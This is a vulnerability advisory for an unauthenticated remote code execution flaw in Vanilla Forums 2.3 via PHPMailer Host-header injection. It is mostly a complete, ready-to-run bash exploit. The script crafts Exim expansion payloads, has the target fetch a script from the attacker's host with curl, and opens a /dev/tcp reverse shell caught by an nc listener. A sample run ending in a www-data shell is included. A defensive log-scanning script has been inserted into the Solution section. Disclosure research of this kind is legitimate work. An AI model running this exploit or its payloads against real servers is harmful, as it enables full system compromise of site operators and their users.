=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10033
- Release date: 11.05.2017
- Revision 1.0
- Severity: Critical
=============================================

I. VULNERABILITY
-------------------------

Vanilla Forums <= 2.3 Unauth. Remote Code Execution (RCE) exploit CVE-2016-10033 [0day]

II. BACKGROUND
-------------------------

"Community Forums Reinvented
Create an online community that your customers will love. Vanilla's forum software is used by top brands to engage customers, drive loyalty and reduce support costs."

"Vanilla provides cloud and open source community forum software that powers discussion forums worldwide with close to 1M downloads. Built for flexibility and integration, Vanilla is the best, most powerful community solution in the world."

https://vanillaforums.com/en/software/
https://open.vanillaforums.com/

III. INTRODUCTION
-------------------------

Vanilla Forums software (including the latest stable version 2.3 in its default configuration) is affected by:

* Remote Code Execution CVE-2016-10033 (0day)

which can be exploited by unauthenticated remote attackers to execute arbitrary code and fully compromise the target application when combined with the Host Header injection vulnerability CVE-2016-10073 (described in a separate advisory).

IV. DESCRIPTION
-------------------------

As described in the advisory of CVE-2016-10073:

The HOST header is used to form the sender email address, as can be seen in the following snippet of code:

------[ library/core/class.email.php ]------
...
public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
    if ($SenderEmail == '') {
        $SenderEmail = c('Garden.Email.SupportAddress', '');
        if (!$SenderEmail) {
            // No static support address configured: the sender is built
            // from the client-controlled Host header of the current request.
            $SenderEmail = 'noreply@'.Gdn::request()->host();
        }
    }

    if ($SenderName == '') {
        $SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
    }

    if ($this->PhpMailer->Sender == '' || $bOverrideSender) {
        // The derived address becomes the envelope sender (sendmail -f argument).
        $this->PhpMailer->Sender = $SenderEmail;
    }

    ob_start();
    $this->PhpMailer->setFrom($SenderEmail, $SenderName, false);
    ob_end_clean();
    return $this;
}
...
-----------------------------------------

In the default configuration of Vanilla the address is then passed to the PHPMailer library as the sender address in the line:

$this->PhpMailer->Sender = $SenderEmail;

The official stable version 2.3 available at:
https://open.vanillaforums.com/addon/vanilla-core-2.3
is bundled with the PHPMailer library in version 5.1:

-----[ library/vendors/phpmailer/class.phpmailer.php ]----
<?php
/*~ class.phpmailer.php
| Software: PHPMailer - PHP email class
| Version: 5.1
----------------------------------------------------------

This version of PHPMailer is affected by the:

* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

vulnerability, also discovered by the author of this advisory and described in detail at:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Similarly to the recently disclosed exploit of WordPress Core 4.6 RCE:
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

remote attackers may exploit the PHPMailer vulnerability in Vanilla Forums by passing the payload (additional parameters to /usr/sbin/sendmail) within the HOST header.
For example, the following web request:

---
POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: vanilla-forums-vhost -X
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149

hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON
---

would inject the -X parameter at the end of the argument list passed to /usr/sbin/sendmail:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-oi]
Arg no. 4 == [-f]
Arg no. 5 == [noreply@attackers_server]
Arg no. 6 == [-X]

NOTE:
It should be noted that this vulnerability can still be exploited even if the Vanilla software is hosted on an Apache web server with several name-based vhosts enabled, and despite not being the default vhost. This is possible as the attacker can take advantage of the HTTP/1.0 protocol and specify the exact vhost within the URL. This allows the HOST header to be set to an arbitrary value, as the Apache server will obtain the SERVER_NAME from the provided URL. This ensures that the malicious request will reach the affected code despite an invalid vhost within the HOST header.

To demonstrate, the above web request could simply be modified to:

---
POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1
Host: arbitrary-string -X
---

to achieve the same effect on a host with multiple vhosts.

V. PROOF OF CONCEPT EXPLOIT
-------------------------

---[ vanilla-forums-rce-exploit.sh ]---

#!/bin/bash
#
# [LegalHackers ASCII-art banner]
#
#
# Vanilla Forums <= 2.3 Remote Code Execution (RCE) PoC Exploit 0day
# Core version (no plugins, default config.)
#
# CVE-2016-10033 (RCE)
# CVE-2016-10073 (Header Injection)
#
# vanilla-forums-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski
# https://legalhackers.com
# https://twitter.com/dawid_golunski
#
# ExploitBox project:
# https://ExploitBox.io
#
#
# Exploit code:
# https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh
#
# Full advisory URL:
# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html
#
#
# Related advisories:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
#
# White-paper 'Pwning PHP mail() function For Fun And RCE'
# https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
#
#
# Usage:
# ./vanilla-forums-rce-exploit.sh target-forum-url reverse_shell_ip
#
# Tested on:
# Vanilla Core 2.3
# https://open.vanillaforums.com/addon/vanilla-core-2.3
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulnerabilities/exploitation?
#
#
# [ExploitBox.io ASCII-art banner]
#
#
# Subscribe at:
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------

intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"

function prep_host_header() {
    cmd="$1"
    rce_cmd="\${run{$cmd}}";

    # replace / with ${substr{0}{1}{$spool_directory}}
    #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
    rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

    # replace ' ' (space) with
    #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
    rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"

    #return "target(any -froot@localhost -be $rce_cmd null)"
    host_header="target(any -froot@localhost -be $rce_cmd null)"
    return 0
}

echo "$intro" | base64 -d

if [ "$#" -ne 2 ]; then
    echo -e "Usage:\n$0 target-forum-url reverse_shell_ip\n"
    exit 1
fi
target="$1"
rev_host="$2"

echo -e ' \e[44m| ExploitBox.io |\e[0m'
echo -e " \e[94m+ --=|\e[0m \e[91m Vanilla Forums <= 2.3 Unauth. RCE Exploit \e[0m \e[94m|\e[0m"
#sleep 1s
echo -e "\e[94m+ --=|\e[0m \e[94m|\e[0m
\e[94m+ --=|\e[0m Discovered & Coded By \e[94m|\e[0m
\e[94m+ --=|\e[0m \033[94mDawid Golunski\033[0m \e[94m|\e[0m
\e[94m+ --=|\e[0m \033[94mhttps://legalhackers.com\033[0m \e[94m|\e[0m
\e[94m+ --=|\e[0m \033[94m@dawid_golunski\033[0m \e[94m|\e[0m
\e[94m+ --=|\e[0m \e[94m|\e[0m
\e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m
\e[94m+ --=|\e[0m \e[91m*\e[0m For testing purposes only \e[91m*\e[0m \e[94m|\e[0m
"

echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo

if [ "$choice" == "y" ]; then
    echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
    #sleep 2s
    #sleep 2s

    # Host payload on :80
    RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
    echo "$RCE_exec_cmd" > rce.txt
    python -mSimpleHTTPServer 80 2>/dev/null >&2 &
    hpid=$!
    # POST data string
    data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'

    # Save payload on the target in /tmp/rce
    cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
    prep_host_header "$cmd"
    curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
    if [ $? -ne 0 ]; then
        echo "[!] Failed connecting to the target URL. Exiting"
        exit 2
    fi
    echo -e "\e[92m[+]\033[0m Connected to the target"
    echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
    sleep 2s

    # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
    cmd="/usr/bin/nohup /bin/bash /tmp/rce"
    prep_host_header "$cmd"
    #echo -e "Host Payload2: \nHost: $host_header"
    curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 &
    echo -e "\n\e[92m[+]\033[0m Payload executed!"

    echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
    nc -vv -l 1337
    #killall python
    echo
else
    echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
    exit 0
fi

#kill -9 $hpid
echo "Exiting..."
exit 0

---[ EOF ]---

Video PoC
~~~~~~~~~~~

Example run
~~~~~~~~~~~~

# ./vanilla-forums-rce-exploit.sh http://xenial//vanilla2-3/ 192.168.57.1

[LegalHackers / ExploitBox.io ASCII-art banner]
 | ExploitBox.io |
 + --=| Vanilla Forums <= 2.3 Unauth. RCE Exploit |
 + --=| |
 + --=| Discovered & Coded By |
 + --=| Dawid Golunski |
 + --=| https://legalhackers.com |
 + --=| @dawid_golunski |
 + --=| |
 + --=| "With Great Power Comes Great Responsibility" |
 + --=| * For testing purposes only * |

[*] Sure you want to get a shell on the target 'http://xenial//vanilla2-3/' ? [y/N] y

[*] Guess I can't argue with that... Let's get started...

[+] Connected to the target

[+] Payload sent successfully

[+] Payload executed!

[*] Waiting for the target to send us a reverse shell...

Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport 51744)
bash: cannot set terminal process group (5243): Inappropriate ioctl for device
bash: no job control in this shell
www-data@xenial:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@xenial:/$ whoami
whoami
www-data
www-data@xenial:/$ exit
exit
exit
Exiting...

VI. BUSINESS IMPACT
-------------------------

Upon successful exploitation, a remote unauthenticated attacker could execute arbitrary code on the target and fully compromise the application and the system on which it is hosted.

VII. SYSTEMS AFFECTED
-------------------------

The latest stable release of Vanilla Forums available at the official website:
https://open.vanillaforums.com/addon/vanilla-core-2.3
was confirmed to be vulnerable. Previous versions are also likely to be vulnerable.

VIII. SOLUTION
-------------------------

This vulnerability was reported to the Vanilla Forums support team in December 2016; however, it has remained unpatched for over 5 months. As there has been no progress in this case, this advisory is finally released to the public without an official patch.
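A defender-side log check, added here as an example and not part of the original advisory or of the Vanilla/PHPMailer code: because the injected Host values shown in section IV ("vanilla-forums-vhost -X", or the expansion string built by prep_host_header) are never syntactically valid hostnames, access logs that record the raw Host header can be scanned for them. It assumes a custom Apache LogFormat that appends %{Host}i (an assumption, not a Vanilla or Apache default); the same is_valid_host rule is what an application-side fix should enforce before deriving a sender address from the request host.

```python
import ipaddress
import re

# Grammar of a legitimate Host header: dot-separated DNS labels of letters,
# digits and hyphens (or a bracketed IPv6 literal), optionally followed by
# ":port". Spaces, "-X", "${run{...}}" or parentheses can never name a vhost.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"^(?:{LABEL}\.)*{LABEL}\.?(?::\d{{1,5}})?$")


def is_valid_host(value: str) -> bool:
    """True if value is a syntactically valid hostname[:port] or [IPv6][:port]."""
    if not value or len(value) > 260:
        return False
    if value.startswith("["):
        lit, sep, port = value[1:].partition("]")
        if not sep or (port and not re.fullmatch(r":\d{1,5}", port)):
            return False
        try:
            ipaddress.IPv6Address(lit)
            return True
        except ValueError:
            return False
    return HOST_RE.match(value) is not None


# Assumed LogFormat (constructed): "%h %t \"%r\" %>s \"%{Host}i\"". %{Host}i
# logs the raw header, so the injected value stays visible even when an absolute
# URI in the request line was used to reach the right vhost (section IV NOTE).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<host>[^"]*)"$'
)


def scan_access_log(lines):
    """Return one dict per request whose Host header is not a valid hostname."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m and not is_valid_host(m.group("host")):
            hits.append({k: m.group(k) for k in ("ip", "time", "path", "host")})
    return hits


# Constructed sample log: two benign requests and two carrying injected Host
# values modelled on the requests in section IV.
SAMPLE_LOG = """\
192.0.2.10 [11/May/2017:22:00:01 +0000] "POST /vanilla2-3/entry/passwordrequest HTTP/1.1" 200 "forum.example.com"
192.0.2.11 [11/May/2017:22:00:05 +0000] "POST /vanilla2-3/entry/passwordrequest HTTP/1.1" 200 "vanilla-forums-vhost -X"
192.0.2.12 [11/May/2017:22:00:09 +0000] "POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1" 200 "target(any -froot@localhost -be ${run{id}} null)"
192.0.2.13 [11/May/2017:22:00:12 +0000] "GET /vanilla2-3/discussions HTTP/1.1" 200 "forum.example.com:8080"
"""
```

Running `scan_access_log(SAMPLE_LOG.splitlines())` yields the two requests from 192.0.2.11 and 192.0.2.12; every flagged entry on a mail-sending endpoint such as /entry/passwordrequest is worth treating as an exploitation attempt.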
As a quick mitigation (before updating the affected PHPMailer library), users can pre-set the support email (the sender's address, the Garden.Email.SupportAddress setting read in the snippet above) to a static value, which prevents the dynamic creation of the email address from the HOST header.

IX. REFERENCES
-------------------------

https://legalhackers.com
https://ExploitBox.io
https://twitter.com/Exploit_Box

Vendor site:
https://vanillaforums.com

Confirmed vulnerable stable version of Vanilla Forums 2.3:
https://open.vanillaforums.com/addon/vanilla-core-2.3
https://open.vanillaforums.com/discussion/32822/vanilla-2-3-is-now-available

Video PoC:
https://www.youtube.com/watch?v=8tWfWjfhZWU

PoC exploit code URL:
https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh

Related advisories / white-papers:
https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

X. CREDITS
-------------------------

Discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
https://ExploitBox.io

XI. REVISION HISTORY
-------------------------

11.05.2017 - Advisory released, rev. 1

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.